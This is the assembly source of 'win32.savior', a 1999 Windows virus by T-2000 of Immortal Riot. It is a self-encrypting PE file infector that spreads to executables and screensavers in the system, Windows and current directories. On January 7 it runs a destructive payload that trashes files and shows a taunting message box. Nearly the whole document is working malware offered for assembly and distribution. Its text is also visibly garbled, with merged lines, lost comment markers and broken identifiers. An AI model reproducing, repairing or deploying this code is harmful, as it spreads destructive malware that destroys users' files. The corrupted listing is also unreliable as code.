Win32

; ================================================== ===========================

;

;

; Name: win32.savior v1.00

TYPE: Direct-action variable encrypting pe-infector.

SIZE: Around 1850 bytes.

Author: T-2000 / [Immortal Riot].

E-mail: t2000_@hotmail.com

Date: february 1999.

PayLoad: File-Trashing on January 7th.

;

;

Capabilities:

;

- TRUE WIN32-Compatible (WIN-95 / NT).

- Variable Encrypting (32-bit key).

- Traps Possible Errors with a SEH.

- Infects Files in Windoze System-Directory.

. - DESTRUCTIVE PAYLOAD.

;

;

As for now only the host's import-table is being search for getModule-

; Handlea / W and getProcaddress, this Method Is Fully Win32-Compatible Though

Won't work if the masterioned API's aren't Imported. this Virus Has Been

Succesfully Tested Both Under Windows-95 and Windows-NT Version 4.0.

;

;

; Dedicated to a Painful Death ON January 7th 1999, You Know Who you are ...

;

;

Assemble with: Tasm32 Savior.asm / m / ml

; TLINK32 Savior.obj import32.lib

Pewrsec Savior.exe

;

; ================================================== ===================================. 386

.MODEL FLAT

.Code

ORG 0

Extrn getModuleHandlea: Proc; Hosts Need to Import these for

EXTRN GETPROCADDRESS: PROC; The Virus to Be Able To Spread.

EXTRN EXITPROCESS: Proc; ONLY Used by the carrier.

Debug_mode = 0; if true, no design Occurs

And only dum?. * is infected.

; - Switch Off For Distribution! -

Virus_size EQU (Virus_END-STAR)

Virus_size_mem EQU (Virus_end_mem-start)

MAX_INFECT EQU 3

Min_size_infect EQU 4096

Marker_file EQU 666H

Start:

Push Eax; Reserve Room for EIP.

Pushfd; Save Registers & Flags.

Pushhad

Call get_delta; get ot garization in memory.

Anti_Moron DB 9ah; Overlapping Code, Anti BP.

GET_DELTA: POP EBP

Sub EBP, (Anti_Moron-Start)

MOV EAX, 0

INIT_KEY = DWORD PTR $ -4

MOV EBX, 0

INIT_SLIDE = DWORD PTR $ -4

MOV ECX, (virus_end-encrypted) / 4

Push EBP

Decrypt_dword: xor [EBP (Virus_SIZE-4)], EAX

SUB EBP, 4

Add Eax, EBX; Slide Decryption-Key.

RCL EBX, 1; Slide Key-Slider.

Loop Decrypt_dword

POP EBP

IF ($ -start) MOD 4) GT 0

DB (4 - ($ -start) MOD 4)) DUP (90h)

ENDIF

Encrypted: MOV EAX, EBP

SUB EAX, 1000H; Calculate Image-Base.

Base_displ = DWORD PTR $ -4

Lea EBX, [EAX ((Carrier-Start) 1000H)]]

Old_eip_rva = dword PTR $ -4

MOV [ESP (9 * 4)], EBX; SET Address Host In Stack.

Call setup_seh; push seh-address on stack.

IF debug_mode

Mov Eax, 1; Unhandled Exception.Ret

Else

% OUT [Warning]: non-debug-mode !!

ENDIF

MOV ESP, [ESP 8]; Restore Original Stack.

JMP Restore_seh; Terminate Program-Flow.

Setup_seh: Push DWORD PTR FS: [ECX]; Save Original SEH-POINTER.

MOV FS: [ECX], ESP; SET OUR OWN SEH.

MOV EBX, [EAX 3CH]; Pe-header.

Add Ebx, EAX

MOV EBX, [EBX 128]; import-directory.

Add Ebx, EAX

Find_k32_dir: CMP [EBX], ECX; Reached End of Imports?

JZ JMP_REST_SEH

MOV EDI, [EBX (3 * 4)]; Get Module-Name.

Add Edi, EAX

CMP [EDI], 'NREK'; Is IT Kernel32.dll?

JNE GO_NEXT_DIR

CMP [EDI 4], '23LE'

JE Search_entries

Go_next_dir: Add EBX, (5 * 4); Go to Next Directory.

JMP FIND_K32_DIR

Search_entries: Push EBX

MOV EBX, [EBX]; Array Of RVA's.

Add Ebx, EAX

XOR EDX, EDX

MOV ESI, 1; Initialize 'Not Found'.

Mov EDI, ESI

Search_import: MOV ECX, [EBX EDX]; Reached End Of Array?

JECXZ END_IMPORTS

Add ECX, EAX; Add Base.

LOOK_4_GETMOD: PUSHAD; getModuleHandlea / W?

Lea ESI, [ECX 2]

Lea EDI, [EBP (Name_GetModuleHandlex-start)]

MOV ECX, 15

CLD

REPE CMPSB

JNE EXIT_SEARCH_GM

Pushf

MOV Al, (GET_MODULE-Unicode_Switch) - 1

CMP BYTE PTR [ESI], 'W'; Unicode Type?

JNE Store_Switch_W

XOR Al, Al

Store_Switch_W: MOV [EBP (Unicode_Switch-Start)], Al

POPF

EXIT_SEARCH_GM: POPAD

JNE LOOK_4_GETPROC

MOV ESI, EDX

LOOK_4_GETPROC: PUSHAD; getProcAddress?

Lea ESI, [ECX 2]

Lea EDI, [EBP (Name_GetProcaddress-start)]

MOV ECX, 15

REPE CMPSB

Popad

JNE GO_NEXT_ENTRY

MOV EDI, EDX

GO_NEXT_ENTRY: Add EDX, 4; Next RVA in the array.

JMP Search_import

END_IMPORTS: POP EBX

MOV EBX, [EBX (4 * 4)]

Add Ebx, EAX

Store Assumed getModuleHandle (A / W) -Address.

Push DWORD PTR [EBX ESI] POP ​​DWORD PTR [EBP (getModuleHandlex-start)]

Store Assumed GetProcaddress (A / W) -Address.

Push DWORD PTR [EBX EDI]

POP DWORD PTR [EBP (getProcaddressx-start)]

Dec ESI; getModuleHandle (A / W) FOUND?

JZ JMP_REST_SEH

Dec Edi; getProcadDress (A / W) Found?

JNZ Init_API

JMP_REST_SEH: JMP Restore_seh; Abort All.

Init_api: Lea ESI, [EBP (API_NAMES-START)]

Lea EDI, [EBP (API_ADDRESS-START)]

Setup_module: Push ESI

JMP $; use ANSI or Unicode?

Unicode_Switch = byte PTR $ -1

Add ESI, 9; Use UNICode Equivalent.

GET_MODULE: PUSH ESI

Call [EBP (getModuleHandlex-Start)]

POP ESI

OR EAX, Eax; Terminate When Not Found.

JZ JMP_REST_SEH

XCHG EBX, EAX; Save Module-Base In EBX.

Add ESI, (3 * 9); start named functions.

LOOP_GET_API: Push ESI; Retrieve API-Address of

Push EBX; Named function.

Call [EBP (getProcaddressx-start)]

CLD; Store API-Address.

Stosd

XCHG ECX, EAX; API NOT FOUND?

JECXZ JMP_REST_SEH

Find_next_api: lodsb

OR Al, Al; FOUND END OF API-NAME?

JNZ Find_Next_API

CMP [ESI], AL; this is the end of module?

Jnz loop_get_api

Lodsb

CMP [ESI], Al; End of Whole Table?

JNZ setup_module

Get Local Date & Time.

LEA EBX, [EBP (local_time-start)]

Push EBX

Call [EBP (getLocalTime-start)]

MOV Al, (Read_Header-Trash_Switch) - 1

Is IS IT TIME TO SAY GoodBye?

CMP BYTE PTR [EBX.CURRENT_MONTH], 1

JNE Start_infect

CMP BYTE PTR [EBX.CURRENT_DAY], 7

JNE Start_infect

XOR Al, Al

START_INFECT: MOV [EBP (Trash_Switch-Start)], Al

Lea ESI, [EBP (Current_Directory-start)]

MOV EBX, 260

PUSH ESI

Push ESI; Retrieve Current Path.

Push EBX

Call [EBP (getcurrentdirectorya-start)]

Add ESI, EBX

PUSH ESI

Push Ebx; Retrieve Windoze-Directory.push ESI

Call [EBP (getWindowsDirectorya-start)]

Add ESI, EBX

PUSH ESI

Push Ebx; Retrieve System-Directory.

PUSH ESI

Call [EBP (getSystemDirectorya-start)]

Infect Files in System-Directory.

Call [EBP (SetCurrentDirectorya-start)]

Call infect_directory

Infect Files in Windoze-Directory.

Call [EBP (SetCurrentDirectorya-start)]

Call infect_directory

Infect Files in Current-Directory.

Call [EBP (SetCurrentDirectorya-start)]

Call infect_directory

DISPLAY THE you-are-fucked-window?

CMP BYTE PTR [EBP (trash_switch-start)], 0

Jnz restore_seh

Display an OK-Box with a message.

PUSH 0

Lea Eax, [EBP (PayLoad_title-start)]

Push EAX

Lea Eax, [EBP (PayLoad_Text-Start)]

Push EAX

PUSH 0

Call [EBP (MessageBoxa-start)]

RESTORE_SEH: POP DWORD PTR FS: [0]; restore Original SEH.

POP EAX; trash handler-address.

EXECUTE_HOST: POPAD; Restore Registers & Flags.

POPFD

Ret; returnit.

PayLoad_title DB '....., 0; Silence Means Death ...

PayLoad_text db 'a hum4n g0d tha7 WAS Man-M4de', 0DH

DB 'Wh3re 1S Y0ur Savior N0W ?!', 0

Infect_directory:

Pushhad

Clear Infection-Counter.

AND Byte PTR [EBP (Infect_Counter-start)], 0

Lea Eax, [EBP (Search_Record-start)]

Push EAX

Lea Eax, [EBP (Search_Mask-start)]

Push EAX

Call [EBP (Findfirstfilea-start)]

Mov ESI, ESI; Save Search-Handle In ESI.

INC EAX

JZ EXIT_INF_DIR

Infect_loop: Pushad

Lea EBX, [EBP (Search_Record.Find_File_name-start)]

CMP BYTE PTR [EBP (trash_switch-start)], 0

JZ EXTENSION_OK

MOV ESI, EBX

Find_end_name: lodsb; get next byte of filename.

OR Al, Al; Found end of the asciiz?

JNZ FIND_END_NAME

MOV EAX, [ESI-5]; Get Extension DWORD.

Call Upcase_EAX

CMP EAX, 'EXE'; Standard .exe-file?

JE EXTENSION_OK

CMP EAX, 'RCS.'; Screensaver?

JNE EXIT_INFECT

EXTENSION_OK: PUSH EBX

Call [EBP (getFileAttributesa-start)]

CMP EAX, -1; Error Occurred?

JE EXIT_INFECT

Mov ESI, EAX

And Al, NOT 00000001B; Get Rid of Readonly-Flag.

Push EAX

Push EBX

Call [EBP (SetFileAttributesa-start)]

DEC EAX; Error Occurred?

JNZ EXIT_INFECT

Push ESI; PUSH FileName Attributes

Push ebx; for restore_attr.

Push Eax; Open Candidate-file.

Push EAX

Push 3; Open existing.

Push EAX

Push EAX

PUSH 80000000H OR 40000000H; Read / Write-Access.

Push EBX

Call [EBP (CreateFilea-start)]

MOV [EBP (file_handle-start)], EAX

Mov ESI, EAX

INC EAX; ERROR OCCURRED?

JZ Restore_attr

Push ESI; for CloseHandle.

Push 0; Get Candidate's FileSize.

PUSH ESI

Call [EBP (getFileSize-start)]

CMP EAX, min_size_infect; File Too Small?

JB Close_Handle

Lea EAX, [EBP (Time_Last_Write-Start]]

Push Eax; Get Filedates & Times.

Sub Eax, 8

Push EAX

Sub Eax, 8

Push EAX

PUSH ESI

Call [EBP (getfiletime-start)]

JMP $

TRASH_SWITCH = BYTE PTR $ -1

IF debug_mode

JMP Close_Handle

ENDIF

TRASH FILE with a Part of the Virus.

MOV ECX, 666

MOV EDX, EBP

Call write_file

Truncate file at 666 bytes.

PUSH ESI

Call [EBP (STENDOFFILE-START)]

JMP Restore_Stamp

Read The MZ-HEADER.

Read_Header: Lea EBX, [EBP (Header-Start)]

MOV ECX, 40H

Call read_file

JNZ Close_Handle

CMP [EBX.EXE_MARK], 'ZM'; IT Must Be a true exe-file.

JNE CLOSE_HANDLE

CMP [EBX.RELOC_TABLE], 40H; Contains a new eve-header?

JB Close_Handle

MOV ESI, [EBX 3CH]

Mov Eax, ESI; Seek to PE-header.call seek_file

JZ Close_Handle

MOV ECX, 92; Read-in The PE-HEADER.

Call read_file

JNZ Close_Handle

CMP [EBX.PE_MARK], 'EP'; Verify It's A PE-HEADER.

JNE CLOSE_HANDLE

PROGRAM IS EXECUTABLE?

Test Byte Ptr [Ebx.pe_flags], 00000010B

JZ Close_Handle

Don't Infect DLL'S.

Test Byte Ptr [Ebx.pe_flags 1], 00100000B

JNZ Close_Handle

CMP [EBX.CPU_TYPE], 14CH; MUST BE A 386 File.

JNE CLOSE_HANDLE

Is IS IT ALREADY INFECTED?

CMP [EBX.CHECKSUM], Marker_File

JE close_handle

PUSH ESI

Calculate Position of the last section-header.

Movzx eax, [ebx.number_of_sections]]

Dec AX

MOV ECX, 40

Mul ECX

Calculate size of pe-header.

MOV DX, [ebx.nt_header_size]

Add DX, 24

LEA ECX, [ESI EDX]; Start Section-Headers.

Add Eax, ECX; EAX = Last Section-HEADER.

Push EAX

Seek to last section-header.

Call seek_file

Lea ESI, [EBP (last_section_header-start)]

Push EBX

MOV EBX, ESI; Read last Section-HEADER.

MOV ECX, 40

Call read_file

POP EBX

MOV EAX, [ESI.SECTION_RVA]

Add Eax, [ESI.SECTION_PHYSICAL_SIZE]

MOV [EBP (Base_Displ-start)], EAX

XCHG [EBX.EIP_RVA], EAX

MOV [EBP (Old_eip_rva-start)], EAX

Seek to the end of the section.

MOV EAX, [ESI.SECTION_PHYSICAL_OFFSET]

Add Eax, [ESI.SECTION_PHYSICAL_SIZE]

Call seek_file

MOV EAX, [ESI.SECTION_PHYSICAL_SIZE]

Add Eax, Virus_size

MOV ECX, [ebx.file_align]

Call align_eax

MOV [esi.section_physical_size], EAX

XCHG EDI, EAX; Save Physical-Size In EDI.

Mov Eax, [ESI.SECTION_VIRTUAL_SIZE]

Add Eax, Virus_Size_Mem - 1

MOV ECX, [ebx.object_align]

CALC_MEM_SIZE: INC EAX

Call align_eax

CMP EAX, EDI; Virtual-Size May Not Be

JB CALC_MEM_SIZE; Smaller Than Physical-size.

MOV [ESI.SECTION_VIRTUAL_SIZE], ESIDD EAX, [ESI.SECTION_RVA]

MOV ECX, [ebx.object_align]

Call align_eax

MOV [ebx.image_size], EAX

Set section, executable, code.

OR [ESI.SECTION_FLAGS], 11100000000000000000000000100000B

Lea EDI, [EBP (Buffer-Start)

Pushhad

Get a Random Slide-key.

Call [EBP (GettickCount-start)]

MOV [EBP (Init_SLide-start)], EAX

XCHG EBX, EAX

Get a random encryption-key.

Call [EBP (GettickCount-start)]

MOV [EBP (Init_Key-start)], EAX

MOV ESI, EBP

MOV ECX, (Virus_Size / 2)

CLD

REP MOVSW; Movsd Takes One More Byte,

Gotta Be Compact You KNOW.

MOV ECX, (virus_end-encrypted) / 4

Encrypt_dword: xor [EDI-4], EAX

SUB EDI, 4

Add Eax, EBX

RCL EBX, 1

Loop encrypt_dword

Popad

MOV EDX, EDI; Write VirusBody to End

MOV ECX, Virus_Size; of the last section.

Call write_file

POP EAX; Offset Last Object-HEADER.

Call seek_file

Write Updated Section-Header Back to File.

MOV ECX, 40

Lea Edx, [EBP (last_section_header-start)]

Call write_file

Seek to end of file.

Push 2

Push EAX

Push EAX

Push DWORD PTR [EBP (file_handle-start)]

Call [EBP (SetFilePointer-Start)]

XOR EDX, EDX; ZERO-PAD The Infected File.

Mov edi, [ebx.file_align]

Div EDI

OR EDX, EDX; File Is Already Aligned?

JZ Mark_Inf_File

Sub EDI, EDX; Howit Bytes To PAD?

ZERO_PAD: MOV ECX, 1; Write a Padding-byte.

Lea Edx, [EBP (ZERO_TOLERANCE-START)]

Call write_file

Dec EDI; We've Did 'EM All?

JNZ ZERO_PAD

Mark_INF_FILE: MOV [EBX.CHECKSUM], Marker_File

Pop Eax; Seek to Start of Pe-header.

Call seek_file

MOV ECX, 92; Write Updated pe-header.

MOV EDX, EBX

Call write_file

Increment Our Infection-Counter.

INC BYTE PTR [EBP (Infect_Counter-Start); Restore Original File-Dates & Times.

RESTORE_STAMP: Lea Eax, [EBP (Time_Last_Write-Start]

Push EAX

Sub Eax, 8

Push EAX

Sub Eax, 8

Push EAX

Push DWORD PTR [EBP (file_handle-start)]

Call [EBP (SetFileTime-start)]

Close_Handle: Call [EBP (CloseHandle-Start)]

Restore_attr: Call [EBP (SetFileAttributesa-Start)]

EXIT_INFECT: POPAD

WE'VE DID ENOUGH INFECTIONS?

CMP BYTE PTR [EBP (Infect_Counter-Start), Max_INFECT

JNB Close_Find

Find Another file.

Lea Eax, [EBP (Search_Record-start)]

Push EAX

PUSH ESI

Call [EBP (FindNextFilea-start)]

Dec EAX; Continue if Search Went OK.

JZ Infect_Loop

Close_find: Push ESI; Close Search-Handle.

Call [EBP (FindClose-start)]

EXIT_INF_DIR: POPAD

RET

EAX = OFFSET.

Returns Zf if Error.

Seek_file:

PUSH 0

PUSH 0

Push EAX

Push DWORD PTR [EBP (file_handle-start)]

Call [EBP (SetFilePointer-Start)]

INC EAX

RET

Ebx = buffer.

ECX = bytes to read.

Returns Zf if Successful.

Read_file:

PUSH 0

Lea Eax, [EBP (Bytes_Read-start)]

Push EAX

Push ECX

Push EBX

Push DWORD PTR [EBP (file_handle-start)]

Call [EBP (ReadFile-Start)]

Dec EAX

RET

ECX = Amount of Bytes.

Edx = Buffer.

Returns Zf if Successful.

WRITE_FILE:

PUSH 0

Lea Eax, [EBP (Bytes_Read-start)]

Push EAX

Push ECX

Push Edx

Push 12345678H

FILE_HANDE = DWORD PTR $ -4

Call [EBP (Writefile-start)]

Dec EAX

RET

Align_EAX:

XOR EDX, EDX

Div ECX

OR EDX, EDX; Even Division?

JZ NO_ROUND; the no need to round-up.

Inc Eax; Round-Up.

NO_ROUND: MUL ECX

RET

Copyright db '(c) 1999 T-2000 / Immortal Riot.', 0

Upcase_eax:

ROL EAX, 8

Call Upcase_Alrol Eax, 8

Call Upcase_al

ROL EAX, 8

Call Upcase_al

ROL EAX, 8

Upcase_al: CMP Al, 'A'

JB EXIT_UPCASE_AL

CMP Al, 'Z'

JA EXIT_UPCASE_AL

SUB Al, 'A' - 'A'

EXIT_UPCASE_AL: RET

IF debug_mode

Search_mask db 'DUM? *', 0

Else

Search_mask db '*. *', 0

ENDIF

API_NAMES:

DB 'Kernel32', 0

DW 'K', 'E', 'R', 'N', 'E', 'L', '3', '2', 0

DB 'CreateFilea', 0

DB 'CloseHandle', 0

DB 'setFilePointer', 0

DB 'Readfile', 0

DB 'Writefile', 0

DB 'getFilesize', 0

DB 'FindfirstFilea', 0

DB 'FINDNEXTFILEA', 0

DB 'FindClose', 0

DB 'getfiletime', 0

DB 'setFiletime', 0

DB 'getFileAttributesa', 0

DB 'setFileAttributesa', 0

DB 'getLocalTime', 0

DB 'STENDOFFILE', 0

DB 'getcurrentdirectorya', 0

DB 'setcurrentdirectorya', 0

DB 'getWindowsDirectorya', 0

DB 'getSystemDirectorya', 0

DB 'gettickcount', 0

DB 0

DB 'USER32', 0, 0, 0

DW 'u', 's', 'e', ​​'r', '3', '2', 0, 0, 0

DB 'MessageBoxa', 0

DB 0

ZERO_TOLERANCE DB 0

Name_GetProcaddress DB 'getProcaddress', 0

Name_getmoduleHandlex DB 'getModuleHandle'

IF ($ -start) MOD 4) GT 0

DB (4 - ($ -start) MOD 4)) DUP (0)

ENDIF

Virus_end:

API_ADDRESSES:

; === API's from kernel32.dll. ===

CreateFilea DD 0

CloseHandle DD 0

SetFilePointer DD 0

ReadFile DD 0

Writefile DD 0

GetFileSize DD 0

Findfirstfilea DD 0

FindNextFilea DD 0

FindClose DD 0

GetFiletime DD 0

SetFileTime DD 0GetFileAttributesa DD 0

SetFileAttributesa DD 0

GetLocalTime DD 0

STENDOFFILE DD 0

GetCurrentDirectorya DD 0

SetCurrentDirectorya DD 0

GetWindowsDirectorya DD 0

GetsystemDirectorya DD 0

GetTickCount DD 0

; === API's from user32.dll. ===

Messageboxa DD 0

GetModuleHandlex DD 0; THESE Are Being Fetched

GetProcaddressx DD 0; from the host's import.

Local_time DW 8 DUP (0)

Time_creation DD 0, 0

Time_last_access DD 0, 0

Time_last_write DD 0, 0

Infect_counter db 0

BYTES_READ DD 0

HEADER DB 92 DUP (0)

Last_section_header DB 40 DUP (0)

Search_Record DB 318 DUP (0)

Current_directory DB 260 DUP (0)

Windows_directory db 260 dup (0)

SYSTEM_DIRECTORY DB 260 DUP (0)

Buffer DB Virus_Size DUP (0)

Virus_end_mem:

Carrier:

Push 0; Terminate Current Process.

Call EXITPROCESS

; ---------------------- Some Used Structures ------------------------ ------------

EXE_HEADER STRUC

EXE_MARK DW 0; MZ-Marker (MZ Or ZM).

Image_mod_512 dw 0

Image_512_pages dw 0

Reloc_Items DW 0

HEADER_SIZE_MEM DW 0

Min_size_mem dw 0

MAX_SIZE_MEM DW 0

Program_ss dw 0

Program_sp DW 0

MZ_CHECKSUM DW 0

Program_ip dw 0

Program_cs dw 0

Reloc_table dw 0

EXE_HEADER ENDS

PE_HEADER STRUC

PE_MARK DD 0; PE-MARKER (PE / 0/0).

CPU_TYPE DW 0; Minimal CPU Required.

Number_of_sections dw 0; Number of Sections in PE.

DD 0

RESERVED_1 DD 0

DD 0

NT_HEADER_SIZE DW 0

PE_FLAGS DW 0

DD 4 DUP (0)

EIP_RVA DD 0

DD 2 DUP (0)

Image_base dd 0

Object_align DD 0

File_Align DD 0

DW 0, 0

DW 0, 0

DW 0, 0

DD 0

Image_size DD 0

DD 0

Checksum DD 0

PE_HEADER ENDS

Section_Header Struc

Section_name DB 8 DUP (0); Zero-Padded Section-Name.

Section_virtual_size DD 0; Memory-Size of Section.

Section_rva dd 0; start section in memory.section_physical_size dd 0; section-size in file.

Section_physical_offset DD 0; section file-offset.

Section_reserved_1 DD 0; NOT USED for Executables.

Section_reserved_2 DD 0; NOT USED for Executables.

Section_reserved_3 DD 0; NOT USED for Executables.

Section_flags DD 0; Flags of The Section.

Section_Header Ends

Find_first_next_win32 struc

File_attributes DD 0

Creation_time DD 0, 0

Last_accessed_time DD 0, 0

Last_written_time DD 0, 0

Find_file_size_high dd 0

Find_file_size_low dd 0

Find_reserved_1 DD 0

Find_reserved_2 DD 0

Find_file_name db 260 dup (0)

Find_dos_file_name dB 14 DUP (0)

Find_first_next_win32 Ends

Date_time Struc

Current_Year DW 0

Current_Month DW 0

Current_day_of_week dw 0

Current_day dw 0

Current_Hour DW 0

Current_minute dw 0

Current_second dw 0

Current_MilliseCond DW 0

Date_time Ends

End Start